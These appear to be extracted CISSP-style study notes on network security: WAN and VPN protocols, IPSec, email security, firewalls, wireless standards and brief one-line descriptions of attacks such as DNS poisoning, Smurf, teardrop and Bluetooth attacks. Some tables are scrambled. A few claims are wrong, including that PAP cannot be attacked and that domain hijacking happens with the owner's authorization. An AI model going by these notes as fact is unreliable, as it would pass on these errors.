 DHCP snooping ensures that DHCP servers can assign IP addresses to only selected systems,

 X.400 is replaced by SMTP

WAN Technologies

Frame Relay X.25 ATM

packet-switched WAN packet-switched WAN Transfers data in Fixed Cells

technologies technologies

Supports multiple PVCs, Need Data Only Traffic, Transmits data a very high rate
DTC/DCE

provides a Committed Data & Network Link Layer It supports voice, data, and video
Information Rate (CIR applications
 36

 Frame relay is very similar to X.25, but it has removed the error checking that was done on the
network. Frame relay handles this task at the end node, which helps to improve speed
dramatically. Asynchronous Transfer Mode (ATM) is a cell-switching technology that provides
extremely fast and efficient connection paths. It uses fixed-length cells rather than packets.

 X.25 is a packet-switching technology that is used by telecommunications services for data-only

traffic. It is a subscriber-based service that operates within the network and data link layers.

 Frame Relay supports multiple private virtual circuits (PVCs), unlike X.25. It is a packet-
switching technology that provides a Committed Information Rate (CIR), which is a minimum
bandwidth guarantee provided by the service provider to customers. Finally, Frame Relay
requires a DTE/DCE at each connection point, with the DTE providing access to the Frame Relay
network, and a provider-supplied DCE, which transmits the data over the network.

 Frame relay and X.25 are packet-switched WAN technologies that use virtual circuits instead of
dedicated ones. ATM transfers data in fixed cells, is a WAN technology, and transmits data at
very high rates. It supports voice, data, and video applications

 Frame relay, X.25 and Multiprotocol Label Switching (MPLS) are explicitly WAN technologies.

 A screened subnet filters external traffic and passes it on to the firewall (the second screening
device) and then on to the internal network. A screened subnet creates a DMZ by using two
routers or firewalls. A screened host is a screening router that is in front of a firewall, but does
not create a DMZ
 With DKIM, domain-based digital certificates are sent with each message, transparently to the
user, and are then verified by the receiving mail exchanger. Public keys are generated per
domain, not per sender or recipient, and are stored in DNS rather than shared ad hoc (as is
typical in PGP).

 Fibre optics would be most protected from environmental threats. Infrared signals can be
impacted by heavy rain, free space optics can be affected by fog, and satellite transmissions
are affected by weather disruptions, such as cloud cover, rain, and snow.

 A passive attack means that an attacker is not actually doing something, but is monitoring a
connection. Passive attacks can be carried out through sniffing, traffic analysis, or wiretapping.
An active attack means the attacker is carrying out some type of activity. Active attacks can be
DoS, brute-force, or dictionary attacks.

 The Session Initiation Protocol (SIP) is an IETF-defined signalling protocol, widely used for
controlling multimedia communication sessions such as voice and video calls over IP.

 The network perimeter concept recognizes the need to separate sensitive networks from non-
sensitive networks and accomplishes this by using choke points

 Layer 2 Tunneling Protocol (L2TP) can tunnel through networks that incorporate many types of
protocols, such as X.25, ATM, and frame relay. Point-to-Point Tunneling Protocol (PPTP) and IP
Security (IPSec) can only work over IP-based networks. L2TP does not provide any encryption
and must be combined with IPSec if this type of protection is needed. L2TP was developed by
combining the best of the Layer 2 Forwarding (L2F) and PPTP protocols.
 37

 Oversized packets must be disassembled by a router and then reassembled at their destination.
Teardrop attacks insert a confusing value in the packet that makes it virtually impossible for
the final routing device to reassemble it.

 Dispersion is the spreading out of light pulses, which overlap the preceding or upcoming pulses.
This is most prevalent in fiber-optic cabling

 Isochronous processes must deliver data within set time constraints. Applications are typically
video related where audio and video must match perfectly. VoIP is another example

 SIP consists of two major components: the User Agent Client (UAC) and User Agent Server
(UAS). The UAC is the application that creates the SIP requests for initiating a communication
session. UACs are generally messaging tools and soft-phone applications that are used to place
VoIP calls. The UAS is the SIP server, which is responsible for handling all routing and signalling
involved in VoIP calls

 Proxy firewalls provide better security as they act as middlemen separating the trusted and
untrusted networks. They actually break the connection and do not allow external users to have
direct access to internal resources.

Common attacks:

 Virus: Malicious code which is created to infect systems.

 Worms: Malicious code which propagates itself
 Logic Bomb: Execute the code on April 1 2020. (time based/event based)
 Trojan: Executable file which resembles like a legitimate file which infects the system.
 Backdoor: Entry point in an application which is not authorized.
 Salami: Stealing small amounts to avoid getting noticed and accumulating it to bigger amount
(salami slices)
 Data diddling: Altering raw data just before it is getting processed by a computer.
 Sniffing: Listening to the traffic being transmitted
 Session Hijacking: Capturing authentication session to identify credentials.
 War dialing: Dialing the random numbers to identify the modem running behind.
 DDoS: Sending packets beyond the bandwidth capacity
 Syn Flood: sending syn packets in 3 way handshake process without completing the handshake.
 Smurf: Sending ICMP packets (DDoS)
 Fraggle: Similar to smurf just uses UDP packets.
 Loki: Covert channel
 Teardrop: Sending fragmented packets in an order which cannot be re-arranged.
 Vishing & SPIT are Caller ID Spoofing Attack

DNS Attacks:

 DNS Poisoning – Altering Domain Name – IP Mapping

 DNS Spoofing – Sending false replies to a requesting system
 DNS Hijacking – Sending falsified replied to caching DNS servers for non-existent subdomains
 Homograph Attack – It leverage similarities in a character set to register phony international
Domain Name
 Domain Hijacking/Domain Theft – It is the action of changing the registration of a Domain name
with authorization of the valid owner
 DNS Pharming – Malicious redirection of a valid website’s URL or IP address to a false website
that hosts a false version of the original web site
 Hyperlink Spoofing – Same as DNS spoofing (hyperlink)

Telephone Services Attack:

 38

 Black Box – To manipulate line voltage to steal long-distance services

 Red Box – To simulate tons of coins
 Blue Box – To interact directly with telephone trunk systems (simulate 2600 MHz)
 White Box – To control the phone system

DISA – Direct Inward System Access – To reduce PBX fraud by external parties

Firewalls: All firewalls are multi-homed

Packet Filter Application Circuit Level/Proxy State Full

Level/Proxy
1st Generation 2nd Generation 2nd Generation 3rd Generation
Layer 3 Layer 7 Layer 5 Layer 3 & 4
Uses ACL (rules that Extra processing Used to establish Router keeps a track
firewall applies) degrades the communication session of connection in a
performance as it between trusted table. It knows which
examines each packet. partners connections are active
Do not look into Can have logging, Also called as Circuit More complex, can
applications. Can’t auditing and access proxies. launch DoS against
block virus control feature. itself by trying to fill
up all the entries in
state table.
More Secure

Circuit Switching Vs Packet Switching

Feature Circuit Packet

Summary Dedicated channel is created between 2 Message is broken in small
communicating parties. Once the connection is segments and each packet
established, link remains the same (consistent search its own way to
connection). All data follows the same path. destination
Technologies PSTN, ISDN, DSL, T-carriers X.25, Frame Relay, ATM, VOIP,
MPLS, cable modems (Very high
speed, shared bandwidth)

Protocol Auth Data Protocols Dial-Up # Connection

Encryption
PPTP Yes No IP Yes Point to Point
L2F Yes No IP Yes Point to Point
L2TP Yes No Any Yes Point to Point
IPSec Yes Yes IP No Multiple

Bluetooth Attacks – PAN (Personal Area Network) (JSB) – FHSS Modulation Technique
 39

It uses a weak encryption cipher

o § Blue Jacking --> Sending SPAM – Allows at attacker to transmit SMS like messages to
your device
o § Blue Snarfing --> Copies information of the remote device – Allows attacker to
connect with your Bluetooth Device without your knowledge and extract information
from them
o § Blue Bugging --> More serious. Allows full use of phone, make call and can eaves drop
on calls.- It is an attack that grants hackers remote control over the feature and
functions of a Bluetooth Device

Specialized Protocols
 SDLC – Synchronous Data Link Control is used on permanent physical connection of
dedicated leased line to provide connectivity for mainframes
 HDLC – High Level Data Link Control – Refined version of SDLC designed for serial
synchronous connections

Auth Protocol

 CHAP - Challenge Handshake Authentication Protocol: Used over Point to Point Protocol (PPP).
Encrypts userID and passwords. Protects against replay attack. Reauthenticates. -CHAP
 PAP - Password Authentication Protocol: Transmits userID and password in clear text. Just
transports credentials - PAP.
o *Exam tip: There are no attacks against PAP as everything is in cleartext.
 Extensible Authentication Protocol: EAP allows customized authentication security solutions
such as supporting smart cards, tokens and biometrics .This is a Framework for authentication
which can be incorporated with any type of authentication.
o Protected EAP: EAP itself doesn’t provide any security so it encapsulates EAP in TLS
tunnel.
o Lightweight EAP: Cisco Proprietary but it was broken with ASLEAP attack.

 Dial-Up Protocols
 PPP – PPP is widely supported and is the transport protocol of choice for dial-up internet
connections, it is protected through the use of various protocols such as PAP & CHAP
 SLIP – Not provide error detection and error correction, it was used over low speed serial
interface.
 VPN Protocols

 VPN offers confidentiality, Virtual Private Network ( VPN) Two types of connections PPTP ( GRE)
and L2TP(IPSEC), VPN uses CHAP and MSCHAP as authentication mechanisms.
 PPTP GRE - Generic Routing Encapsulation , data is sent over plain text
 L2TP doesn’t offer encryption, it uses IPSEC for encryption.

PPTP

 Uses GRE (Generic Routing Encapsulation)

 Do not provide encryption or authentication
 Doesn’t support RADIUS & TACAS+

L2F

 Developed by CISCO
 It does not offer encryption
 It was replaced by L2TP

L2TP

 It lacks a built-in encryption scheme, but it relies on IPSec as its security

 40

 L2TP supports TACAS+ & RADIUS

 IPSec is commonly used as a security mechanism for L2TP

IPSec

 IPSec - Three important components

 Modes - Transport mode & Tunnel model
 Key Management - IKE ( Delphe helman) and SKIP,
 Key cryptography AES and Symmetric key
 Protocol - AH ( Authentication and integrity ) and ESP ( Confidentiality, Authenticity
and integrity), ESP is more secure than AH.
 IPsec - Provides Port level security, LAN based security, packet filtering services and
Security over VPN solutions, It provides key agreement service.IPSec/AH doesn’t work
with NAT, because NAT requires header modification. IPSec/ESP works with NAT.
 Key Exchange
o SKIP Hybrid Key exchange protocol similar to SSL
o IKE- No security services, just management for secure connection
 Security Associations ( SAs)
o - Defines the mode that an end point will use to communicate with its partner
o - Identifies each session.

HAIPE

 High Assurance Internet Protocol Encryptor

 Used for highly secure communications
 Uses Preplaced Keys or Firefly Vectors to create VPN
 At the intersection between a protected and unprotected network place a HAIPE device
to secure Data

 Email Security Solutions

S/MIME

 S/MIME is an email security standard that uses public key encryption and digital
signatures to enable authentication and confidentiality for emails. X.509 digital
certificates are used to provide authentication. Public Key Cryptography Standard
(PKCS) encryption is used to provide privacy. Two types of messages can be formed
using S/MIME:
o o Signed messages: To provide integrity, sender authentication, and nonrepudiation
of the sender
o o Enveloped messages: To provide integrity, sender authentication, and
confidentiality

DKIM

o DKIM is a means to assert that valid mail is sent by an organization through

verification of domain name identity. This adds a layer of nonrepudiation and
authentication that is particularly helpful in identifying and filtering spoofed
addresses in emails. Implementing DKIM relies on public keys and digital signing.

 L2TP Vs PPTP Vs IPSec

1. L2TP can Tunnel through networks that incorporate may type of protocols such as
X.25, ATM & Frame Relay
2. PPTP & IPSec can only work over IP-based Networks
3. For Dial Up connectivity PPTP only work
4. Protocols @ VPN are – PPTP, L2TP & IPSec
5. Use L2TP when traffic needs to travel over different WAN technologies.
 41


1. PPTP Vs L2TP
2. Only IP Based Vs. IP, Frame Relay, x.25 or ATM
3. No Header Compression Vs. Header Compression
4. No Tunnel Auth Vs. Tunnel Auth
5. Built in PPP Encryption Vs. Use IPSec Encryption

 Effective Countermeasure @ SPAM

1. Properly configured mail relay servers
2. Filtering on email gateway
3. Filtering on email client
4. Do not use open mail relay servers
 802.1 – Standards
1. 802.1AR – Specifies unique per-device identifier (DevID) and the management and
cryptographic binding of a device(router, switch & access point) to its identifiers
2. 802.1AE – IEEE MAC security standard (MACSec) which defines a security
infrastructure to provide data confidentiality, data integrity and data origin auth.
3. 802.1AF – It carries out key agreement functions for the session keys used for data
encryption
 Difference between a virtual firewall that works in bridge mode versus one that is embedded
into a hypervisor
1. Bridge Mode – Firewall to monitor individual traffic links
2. Hypervisor integration – Allows firewall to monitor all activities taking place within
a host system
 SIP/RTP/SRTP
1. SIP – Used for all VoIP transactions except the actual media exchange between
calling or receiving stations
2. RTP/SRTP – Commonly used between end nodes for direct media interaction
 NAC – Network Access Control – It is some form of EAP auth and for inspection of endpoint of OS
patches levels and antimalware updates, with the goal of placing untrusted systems into a
quarantined VLAN segment.
 TLS is open-community version of SSL
 Types of Encryption
1. Link Encryption
 Encrypts all the data along a specific communication path, as in a satellite
link, T3 line, or telephone circuit. Not only is the user information
encrypted, but the header, trailers, addresses, and routing data that are
part of the packets are also encrypted
 The only traffic not encrypted in this technology is the data link control
messaging information, which includes instructions and parameters that the
different link devices use to synchronize communication methods
 Link encryption provides protection against packet sniffers and
eavesdroppers.
2. End-to-End
 In end-to-end encryption, the headers, addresses, routing, and trailer
information are not encrypted, enabling attackers to learn more about a
captured packet and where it is headed
 TKIP – Works with WEP, increases the IV size, ensures it is random for each packet and add the
sender’s MAC address to the keying material

 MAN Protocol –
 42

1. Access layer connects the customer’s equipment to a service provider’s aggregation

network
2. Aggregation occurs on a distribution network
3. Core connects different metro networks
 VLAN hopping attack – Attacker can insert tagging values into network and switch based
protocols with the goal of manipulating traffic at the data link layer VLAN hopping is
a computer security exploit, a method of attacking networked resources on a virtual
LAN (VLAN). The basic concept behind all VLAN hopping attacks is for an attacking host on a
VLAN to gain access to traffic on other VLANs that would normally not be accessible. There are
two primary methods of VLAN hopping: switch spoofing and double tagging. Both attack vectors
can be mitigated with proper switch port configuration. VLAN hopping between the voice and
computer VLANs can be accomplished when devices share the same switch infrastructure

 SNMP Versions: SNMP versions 1 & 2 send their community string values in cleartext, but with
version 3, cryptographic functionality has been added, which provides encryption message
integrity and auth security, so that sniffers that are installed on the network can’t sniff SNMP
traffic
 Firewall Rules Type
1. Silent Rule: Drops “noisy” traffic without logging
2. Stealth Rule: Disallows access to firewall software from unauthorized systems
3. Cleanup Rule: Last rule in the rule base which drops and logs any traffic that does
not meet the preceding rules
4. Negate Rule: It provides tighter permission rights by specifying what system can be
accessed and how
 Tarpit: Commonly a piece of software configured to emulate a vulnerable, running service to
reduce the effects of a DoS attack

 802.11g connection modes

1. ad hoc mode, which directly connects two clients
2. stand-alone mode, which connects clients using a wireless access point but not to wired
resources like a central network
3. Infrastructure mode connects endpoints to a central network, not directly to each other
4. wired extension mode uses a wireless access point to link wireless clients to a wired
network

 Frequency Hopping Spread Spectrum (FHSS), Direct Sequence Spread Spectrum (DSSS), and
Orthogonal Frequency-Division Multiplexing (OFDM) all use spread spectrum techniques to
transmit on more than one frequency at the same time. Neither FHSS nor DHSS uses orthogonal
modulation, while multiplexing describes combining multiple signals over a shared medium of
any sort. WiFi may receive interference from FHSS systems but doesn’t use it.

 Distance-vector protocols use metrics including the direction and distance in hops to remote
networks to make decisions. A link-state routing protocol considers the shortest distance to a
remote network.

 Multilayer protocols create three primary concerns for security practitioners: They can conceal
covert channels (and thus covert channels are allowed), filters can be bypassed by traffic
concealed in layered protocols, and the logical boundaries put in place by network segments
can be bypassed under some circumstances.

 802.1x provides port-based authentication and can be used with technologies like EAP, the
Extensible Authentication Protocol. 802.11a is a wireless standard, 802.3 is the standard for
Ethernet, and 802.15.1 was the original Bluetooth IEEE standard.
 43

 While virtual machine escape has only been demonstrated in laboratory environments, the
threat is best dealt with by limiting what access to the underlying hypervisor can prove to a
successful tracker. Segmenting by data types or access levels can limit the potential impact of
a hypervisor compromise

 PEAP provides encryption for EAP methods and can provide authentication. It does not
implement CCMP, which was included in the WPA2 standard. LEAP is dangerously insecure and
should not be used due to attack tools that have been available since the early 2000s.

 Ethernet networks use Carrier-Sense Multiple Access with Collision Detection (CSMA/ CD)
technology. When a collision is detected and a jam signal is sent, hosts wait a random period of
time before attempting retransmission

 Domain Keys Identified Mail, or DKIM, is designed to allow assertions of domain identity to
validate email. S/MIME, PEM, and MOSS are all solutions that can provide authentication,
integrity, nonrepudiation, and confidentiality, depending on how they are used.

 A media gateway is the translation unit between disparate telecommunications networks. VoIP
media gateways perform the conversion between time-division multiplexing (TDM) voice to
Voice over Internet Protocol (VoIP). As a security measure, the number of calls via media
gateways should be limited. Otherwise, media gateways are vulnerable to denial-of-service
attacks, hijacking, and other types of attacks.

 Teredo should be configured on IPv6-aware hosts that reside behind the NAT device. - Teredo
encapsulates IPv6 packets within UDP datagrams with IPv4 addressing. IPv6-aware systems
behind the NAT device can be used as Teredo tunnel endpoints even if they do not have a
dedicated public IPv4 address.

 DNSSEC - DNSSEC protects DNS servers from forged DNS information, which is commonly used to
carry out DNS cache poisoning attacks. If DNSSEC is implemented, then all responses that the
server receives will be verified through digital signatures. This helps ensure that an attacker
cannot provide a DNS server with incorrect information, which would point the victim to a
malicious website.

 Simple Authentication and Security Layer - Simple Authentication and Security Layer is a
protocol-independent authentication framework. This means that any protocol that knows how
to interact with SASL can use its various authentication mechanisms without having to actually
embed the authentication mechanisms within its code.

 VPN can use PPTP, L2TP, TLS, or IPSec as tunneling protocols. • PPTP works at the data link
layer and can only handle one connection. IPSec works at the network layer and can handle
multiple tunnels at the same time.

 A screened-host firewall lies between the perimeter router and the LAN, and a screened subnet
is a DMZ created by two physical firewalls.

 Real-time Transport Protocol (RTP) provides a standardized packet format for delivering audio
and video over IP networks. It works with RTP Control Protocol, which provides out-of-band
statistics and control information to provide feedback on QoS levels

 Link encryption is limited to two directly connected devices, so the message must be decrypted
(and potentially re-encrypted) at each hop. • The Point-to-Point Tunneling Protocol is an
example of a link encryption technology.
 44

 End-to-end encryption involves the source and destination nodes, so the message is not
decrypted by intermediate nodes. • Transport Layer Security (TLS) is an example of an end-to-
end encryption technology.
 Multipurpose Internet Mail Extensions (MIME) is a technical specification indicating how
multimedia data and e-mail binary attachments are to be transferred. • Secure MIME (S/MIME)
is a standard for encrypting and digitally signing e-mail and for providing secure data
transmissions using Public Key Infrastructure (PKI). •

 Pretty Good Privacy (PGP) is a freeware email security program that uses PKI based on a web of
trust. •

 S/MIME and PGP are incompatible because the former uses centralized, hierarchical Certificate
Authorities (CAs) while the latter uses a distributed web of trust.

 PGP can be used to encrypt disk drives bit SMIME can’t

 Screen scraping Screen scraping presents one approach to graphical remote access to systems.
Screen scraping protocols packetize and transmit information necessary to draw the accessed
system’s screen on the display of the system being used for remote access. VNC, a commonly
used technology for accessing remote desktops, is fundamentally a screen scraping style
approach to remote access. However, not all remote access protocols are screen scrapers. For
example, Microsoft’s popular RDP does not employ screen scraping to provide graphical remote
access.

 IPsec is a suite of protocols; the major two are encapsulating security protocol (ESP) and
authentication header (AH). Each has an IP protocol number; ESP is protocol 50 and AH is
protocol 51.

 DRAM uses Capacitor & SRAM uses flipflop to store information

 There are many types of EAP; we will focus on LEAP, EAP-TLS, EAP-TTLS, and PEAP:
o LEAP (lightweight extensible authentication protocol) is a Cisco-proprietary protocol
released before 802.1X was finalized. LEAP has significant security flaws and should not
be used.
o EAP-TLS (EAP-Transport Layer Security) uses PKI, requiring both server-side and client-
side certificates. EAP-TLS establishes a secure TLS tunnel used for authentication. EAP-
TLS is very secure due to the use of PKI but is complex and costly for the same reason.
The other major versions of EAP attempt to create the same TLS tunnel without
requiring a client-side certificate.
o EAP-TTLS (EAP Tunneled Transport Layer Security), developed by Funk Software and
Certicom, simplifies EAP-TLS by dropping the client-side certificate requirement,
allowing other authentication methods (such as passwords) for client-side
authentication. EAP-TTLS is thus easier to deploy than EAP-TLS, but less secure when
omitting the client-side certificate.
o PEAP (Protected EAP), developed by Cisco Systems, Microsoft, and RSA Security, is
similar to and is a competitor of EAP-TTLS, as they both do not require client-side
certificates.
 Radio frequency identification (RFID) is a technology used to create wirelessly readable tags for
animals or objects. There are three types of RFID tags: active, semipassive, and passive. Active
and semipassive RFID tags have a battery. An active tag broadcasts a signal, while semipassive
RFID tags rely on a RFID reader's signal for power. Passive RFID tags have no battery and must
rely on the RFID reader's signal for power.

 RSN is also known as WPA2 (Wi-Fi Protected Access 2), a full implementation of 802.11i. By
default, WPA2 uses AES encryption to provide confidentiality, and CCMP (counter mode CBC
MAC protocol) to create a message integrity check (MIC), which provides integrity. The less
secure WPA (without the “2”) is appropriate for access points that lack the power to implement
the full 802.11i standard, providing a better security alternative to WEP. WPA uses RC4 for
confidentiality and TKIP (Temporal Key Integrity Protocol) for integrity.
 45

 802.11i is the first 802.11 wireless security standard that provides reasonable security. 802.11i
describes a robust security network (RSN), which allows pluggable authentication modules. RSN
allows changes to cryptographic ciphers as new vulnerabilities are discovered.

 Frequency-hopping spread spectrum (FHSS) and direct-sequence spread spectrum (DSSS) are
two methods for sending traffic via a radio band. Both DSSS and FHSS can maximize throughput
while minimizing the effects of interference.

 Orthogonal frequency-division multiplexing (OFDM) is a newer multiplexing method, allowing

simultaneous transmissions to use multiple independent wireless frequencies that do not
interfere with each other.

 Software-defined networking (SDN) separates a router's control plane from the data
(forwarding) plane. The control plane makes routing decisions. The data plane forwards data
(packets) through the router. With SDN routing, decisions are made remotely instead of on each
individual router. The most well-known protocol in this space is OpenFlow, which can, among
other capabilities, allow for control of switching rules to be designated or updated at a central
controller. OpenFlow is a TCP protocol that uses transport layer security (TLS) encryption.

 An Ethernet card and its media access control (MAC) address are at layer 2, as are switches and
bridges. Layer 2 is divided into two sublayers: media access control (MAC) and logical link
control (LLC). The MAC layer transfers data to and from the physical layer, while LLC handles
LAN communications. MAC touches layer 1 and LLC touches layer 3.

 Multiprotocol label switching (MPLS) provides a way to forward WAN data using labels via a
shared MPLS cloud network. Decisions are based on the labels, not on encapsulated header data
(such as an IP header). MPLS can carry voice and data and can be used to simplify WAN routing.

 VoIP brings the advantages of packet-switched networks, such as lower cost and resiliency, to
the telephone. Common VoIP protocols include real-time transport protocol (RTP), designed to
carry streaming audio and video. VoIP protocols such as RTP rely upon session and signaling
protocols including session initiation protocol (SIP, a signaling protocol) and H. 323. SRTP
(secure real-time transport protocol) is able to provide secure VoIP, including confidentiality,
integrity, and secure authentication. SRTP uses AES for confidentiality and SHA-1 for integrity.

 Rouge Access Points: A Rough WAP may be planted by an employer for convenience or it may be
operated by an attacker

 Evil Twin: It is an attack in which a hacker operates a false access point that will automatically
clone or twin, the identity of an access point based on a client device’s request to connect

 Routing protocols determine the optimum path by either hop count or link state. RIP versions 1
and 2 base their routing decision on hops. This underlying process is known as the Bellman Ford
algorithm. These distance vector algorithms are well-suited for small, simple networks. Interior
Gateway Routing Protocol (IGRP) is a Cisco proprietary routing protocol. Open Shortest Path
First (OSPF) is a link state routing protocol that looks at the link state or time to determine the
best route.
 TSIG is primarily used by DNS to provide a means of authenticating updates to a DNS database.
DNSKey contains the Secure DNS (DNSSEC) signature for a record set
 The two primary ways in which routers can deal with ICMP messages are reject and drop.
Reject allows failed traffic to create an ICMP error message and return it to the sending device.
Drop silently discards any traffic that is not allowed into the network or that creates an ICMP
error message
 Category 5e can support cable distances of up to 328 feet (100 meters). These cables are
spliced to RJ-45 connectors on each end and contain four pairs of wire within each run
 Digital Data Service (DDS) is an example of a circuit-switched technology. DDS was developed in
the 1970s and was one of the first digital services used by telephone companies. It has a
maximum data rate of 56 KB. Frame Relay, X. 25, and ATM are all examples of packet-switched
technologies.
 46

 Wormhole attacks result from an attacker tunneling valid data to an accomplice who can replay
the data out of context. A black hole is the destination when data is sent to a nonexistent
receiver. Tunneling is the method used to move the data between the attackers. The out-of-
band attack was a DoS attack against Windows 95 and Windows for Workgroups (WFW)
machines.
 Honeypots are installed in the DMZ, or a screened subnet. (The original design was to install on
the Internet directly, and temporarily, to study attack styles.) The honeypot would not be
installed on the firewall itself (screened host). Policies and logging that employees are
subjected to must be established as normal business procedures before any malicious behavior
is noted. You would not install honeypots on all employee computers
 Greylisting is a method of defending email users against spam
 Cell phones have progressed through what are known as generations. 1G cell phones have a
target data rate of 2 Kbps, 2G cell phones have a target data rate of 14.4 Kbps, 3G cell phones
have a target data rate of 2 Mbps, and 4G cell phones have a target data rate of at least 100
Mbps (1G-2KBPS, 2G-14.4KBPs, 3G-2MBPS, 4g-100MBPS)
 Microwave would be the best choice because it offers high bandwidth and can easily be
installed as line of site between the two facilities. Twisted pair and coaxial are not optimum
solutions because the land between the sites belongs to a third party. Infrared is designed for
very short distances.
 In terms of Ethernet, what is a backoff algorithm?  A. A random collision timer
 Wireless systems use CSMA/ CA
 Bridges are dated devices, so you probably will not hear too much about them outside the test
environment. Bridges forward broadcast traffic, do not alter header information, and forward
traffic to all ports if the targeted address is unknown. Bridges are Layer 2 devices and do not
filter based on IP addresses
 One of the big differences between 3G and older technologies is that 3G was the first to
support packet switching. Support for circuit switching, Infrared and caller ID was present in
older technologies
 Although ARP goes away in IPv6, it is replaced by Network Discovery Protocol.
 You’re preparing a presentation for the senior management of your company. They have asked
you to rank the general order of accuracy of the most popular biometric systems, with 1 being
the lowest and 5 being the highest. What will you tell them?  A. (1) fingerprint, (2) palm
scan, (3) hand geometry, (4) retina scan, (5) iris scan - FPHRI
 Which of the following types of copper cabling is the most secure against eavesdropping and
unauthorized access?  A. Single-mode fiber  B. Multimode fiber  C. Category 6
 CRC Protocol on Data Link Layer
 Transport layer is also Host to Host
 Network layer is also known as Internet
 WAN & LAN – Data Link Layer
 Bridge Connect two topologies
 Router Connects two networks
 FDDI & Token Ring works on Layer 2
 802.3 – Wired & 802.11 Wifi
 Connection Vs Sessions – One Connection might have multiple Sessions
 Bluetooth – 802.15
 Wireless – 802.16
 Token Ring – 802.5
 VoIP – No Encryption and No Security
 Network Access Control (NAC)
o NAC as an approach for network security control implements several technologies to
limit and meter access to private environments.
o There are several basic goals for the use of NAC:
o ■■ Mitigation of non-zero-day attacks
o ■■ Authorization, authentication, and accounting of network connections
o ■■ Encryption of traffic to the wireless and wired network using protocols for 802.1X
such as EAP-TLS, EAP-PEAP or EAP-MSCHAP
o ■■ Role-based controls of user, device, application, or security posture post
authentication
 47

o ■■ Enforcement of network policy to prevent endpoints from access to the network if

they lack up-to-date security patches or host intrusion prevention software
o ■■ Ability to control access to the network based on device type and user roles
o ■■ Identity and access management based on authenticated user identities instead of
just blocking IP addresses
 UTM – Deep Packet Inspection
 NAT will only with IPSec + ESP (Not IPSec + AH)
 Defence in Depth = Skill + Technology + Process
 Spam Over Internet Telephone – SPIT
 Spam Over Instant Messaging – SPIM
 LAND Attack – Self Ping
 Ping of Death is no Problem in Modern Network Devices
 LAN & WAN Technology works at Data link layer
 SSL/TLS works at Transport Layer - Layer 4
 Fibre Optic Cables
o Single Mode - upto 80 kms distance
o Multi mode - up to 400 meters distance
o POF Plastic Optical Fiber - uses Plastic core , maximum 100 meters.
 Well-Known Ports – 0-1023, Registered Ports – 1024-49151, Dynamic or Private Ports – 49152-
65535
 Port knocking - In computer networking, port knocking is a method of externally opening ports
on a firewall by generating a connection attempt on a set of prespecified closed ports. Its
authentication method.
 FTP
o FTP is a stateful protocol that allows files to be transmitted between hosts and server.
HTTP is stateless protocol.
o FTPS -> FTP over SSL used dynamic ports
o SFTP -> Secure File Transport Protocol SSH over FTP , SFTP is more like a packet
encapsulation, we are encapsulating packet in to SSH tunnel.
o TFTP - Trivial File Transport Protocol Trivial File Transfer Protocol (TFTP) is an Internet
software utility for transferring files that is simpler to use than the File Transfer
Protocol (FTP) but less capable. It is used where user authentication and directory
visibility are not required.
 Security zones are important part of network deployment, Pivoting - an act of penetrating one
network to another network.
 Network Partitioning: Controlling which traffic is forwarded between segments will go a long
way to protecting an organization’s critical digital assets from malicious and accidental harm.
 Trusted Zones: “Private network” which are trusted services provided to an internally
protected network.
 Untrusted Zones: “Public networks” referred to as external or internal facing networks.
 Demilitarized Zone ( DMZ): “Screened subnet” protected by 2 or more firewalls contains a low
risk services. -Mail Server & DNS server
 Security Perimeter: The security perimeter is the first line of protection between trusted and
untrusted networks, In general It includes - A Firewall /- Router that help filter traffic And may
include - Proxies - IDS/IPS

Screened Host
 48

Screened Subnet

MPLS

 VoIP uses Session Initiation Protocol (SIP) designed to manage multimedia connections, provides
integrity protection through MD5 hash functions.
 PLC – Packet Loss Concealment is used in VoIP communication to mask the effect of dropped
packets
 Wireless is prone for sniffing & eavesdropping. Different security standards in place. Over
wireless the data must be encrypted.

 When implementing wireless security, use these recommendations:

o • Select WPA2 (even WPA2 personal) over WEP or WPA.
o • When possible, use a RADIUS server for wireless authentication.
o • If you must use a pre-shared key, make the password complex and change it
regularly.
o • If necessary, enter the MAC addresses of all devices that are permitted to connect to
the wireless network into the access point.

 Use the following recommendations when implementing your firewall:

o • Take the time to really learn and implement the capabilities and limitations of your
particular firewall product. While many administrators spend a great deal of time
configuring the firewall, many other administrators leave firewalls in a default
configuration, which might not be optimal.
o • Recognize that your network has many other possible points of entry besides the
firewall. Thee include wireless access points, VPN servers, dial-up modems, and even
"sneakernet" (users physically transporting data on removable media, plugging devices
into the network behind the firewall). Use as much care securing these alternate points
of entry as you would your firewall
 49

 NAT ( Network Address Translation) - Three types of Nat, Primary objective of NAT is to hide
internal networks from external. NAT by default won’t with IPSEC AH mode, works with IPSEC
ESP mode.
o NAT and PAT - Routers and firewalls can change the source address of each packet to a
different address, Port address translation allows firewall to keep track of multiple
sessions that are using PAT.
o - Static NAT ( one to one)
o - Dynamic NAT ( Many to Many)
o - PAT ( One to Many)

 Guidelines for Implementing Network Architecture Security

 • Understand the layers of the OSI and TCP/IP models and how your network technologies
fit in those layers.
 • Pay attention to the vulnerabilities of each networking protocol that your organization
implements.
 • Understand the vulnerabilities associated with multi-layer protocols, especially when it
comes to SCADA systems.
 • If you implement FCoE, be aware of the threat of eavesdropping and denial of services
attackssince Fibre Channel and TCP/IP are sharing a network.
 • If you implement iSCSI, be aware that it is not encrypted by default.
 • Ensure that any MPLS implementations provide for proper load balancing to defend
against DoS threats.
 • Incorporate VoIP in your network in a way that reduces packet loss, jittering, and other
issues that could affect availability.
 • Use WPA2 to encrypt your Wi-Fi network, and always secure it with a strong password.
 • Implement network encryption protocols where possible to provide confidentiality,
integrity, and authentication of communications in your network.

 One VPN solution is not necessarily better than the other; they just have their own focused
Purposes:
 • PPTP is used when a PPP connection needs to be extended through an IP-based network.
 • L2TP is used when a PPP connection needs to be extended through a non–
 IP-based network.
 • IPSec is used to protect IP-based traffic and is commonly used in gateway-to-gateway
 Connections.
 • TLS VPN is used when a specific application layer traffic type needs protection.

 Guidelines for Implementing Network Components Security

 Here are some guidelines you can use to secure network components:
 • Harden routers, switches, firewalls, and other networking components based on the
manufacturer's recommendations.
 • Use VLANs to partition your network and segregate traffic.
 • Use physical network partitioning in high-security environments.
 • Use firewalls to protect your internal network from the Internet.

 There are several techniques that organizations can employ to strengthen the protection of
their email communications:
 Use digital signatures to combat impersonation attempts
 Block suspicious attachments and potentially risky filename extensions (such as .zip and
.exe) at the gateway to reduce phishing and similar attacks
 Employ filters to reduce spam and mailbombing problems.
 Use encryption to prohibit eavesdropping efforts.
 Train users in the importance of and methods for properly recognizing and handling spam
or potentially malicious links in email.
 Install, run, and update antivirus and endpoint protection.

 Guidelines for Implementing Communication Channel Security

